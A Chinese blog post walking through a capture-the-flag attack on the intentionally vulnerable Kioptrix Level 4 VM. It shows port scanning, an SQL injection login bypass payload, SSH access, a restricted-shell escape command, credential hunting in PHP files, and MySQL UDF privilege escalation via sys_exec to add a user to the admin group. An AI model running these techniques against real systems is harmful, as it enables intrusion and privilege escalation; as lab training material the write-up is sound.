当前位置: 首页 > article >正文

攻破 kioprix level 4 靶机

又又又来了...

法一、

基本步骤

1.确认主机ip,扫描端口确定服务和版本

2.访问网站,扫描目录,查找敏感信息

3.利用敏感信息和SQL注入进入网站

4.ssh服务连接主机

5.shell逃逸并查找敏感信息(与数据库等相关)

6.mysql提权

arp-scan -l

nmap -sS -p- -sV -T4 192.168.5.133

   

dirsearch -u http://192.168.5.133

curl 192.168.5.133

尝试弱口令、万能密码

burp 尝试用户名+密码爆破

没成功,以后要再整理一下字典

根据之前的目录扫描,挖掘信息

能看出来这里创建了 members 表,并写入了 john 的用户数据

以 john 1234 登录

不正确?可能他改了密码?

但可以确定 john 一定存在,先尝试万能密码

1' or '1'='1

下一步横向移动?怎么到后台去呢?

结合之前扫描的 22端口ssh服务,尝试以他的用户名密码进行连接

ssh john@192.168.5.133

连接后发现是低权限用户,且是受限制的shell

参考 渗透技巧——如何逃逸Linux的受限制shell执行任意命令_网易订阅进行shell逃逸

echo os.system('/bin/bash')

 根据该站点的登录情况,应该是开启了mysql服务,查看进程

ps -ef | grep mysql

 且端口为 3306

该网站采用php,搜索php敏感文件查找信息,最好能翻到mysql的账号密码

find / -name "*.php" 2>/dev/null

cat /var/www/rebert/robert.php

尝试一番后找到账号密码,登录

结合linux环境下的MySQL UDF提权_mysql udf提权 linux-CSDN博客对当前john进行提权

mysql -uroot -p

1

查看udf表

select * from mysql.func;

利用sys_exec将john添加到管理员组

select sys_exec('usermod -a -G admin john;);

exit; 退出数据库,sudo su 重登 john,提权成功。

总结

利用信息收集和sql注入获取到john信息,ssh连接,shell逃逸执行命令,查找php文件获取mysql账户密码,利用数据库的UDF提权方式以及sys_exec函数将john账户添加到root组中。

法二、

补充说明

Congratulations!
You've got root.

There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret


http://www.kler.cn/a/460828.html

相关文章:

  • Linux C/C++编程-获得套接字地址、主机名称和主机信息
  • 2501d,d.110
  • 【QT】实现RestFul接口
  • C# 设计模式(结构型模式):装饰器模式
  • 基于AI的运维资源调度:效率与智能的双重提升
  • C++ 设计模式:中介者模式(Mediator Pattern)
  • C++语言编程————C++数据类型与表达式
  • 期权懂|国内场外期权都有哪些种类?
  • MybatisPlus查询更so easy
  • 数据结构与算法之动态规划: LeetCode 62. 不同路径 (Ts版)
  • 非常简单实用的前后端分离项目-仓库管理系统(Springboot+Vue)part 5(未实现预期目标)
  • Pytest 高级用法:间接参数化
  • 25考研希望渺茫,工作 VS 二战,怎么选?
  • 2024年RAG:回顾与展望
  • KEGG大更新:开启生物研究新纪元
  • 物联网技术在电商API接口中的应用实践
  • Spring Boot中使用Zookeeper实现分布式锁的案例
  • SQL相关子查询
  • 【数据分析】基于GEE的2000-2023年逐年归一化差值水分指数(NDMI)获取-以成都市为例
  • neo4j图数据库简介
  • AI的未来?华为仓颉编程语言与人工智能的接轨
  • 【网络协议】什么是 BGP? | 解释 BGP 路由
  • 【算法题解】B. President‘s Office - Python实现
  • 如何利用小程序高效获客,小程序引流怎么样
  • 大语言模型提示词工程 - ReACT 推理模式
  • [.闲于修.]Autosar_UDS_笔记篇_ISO14229-1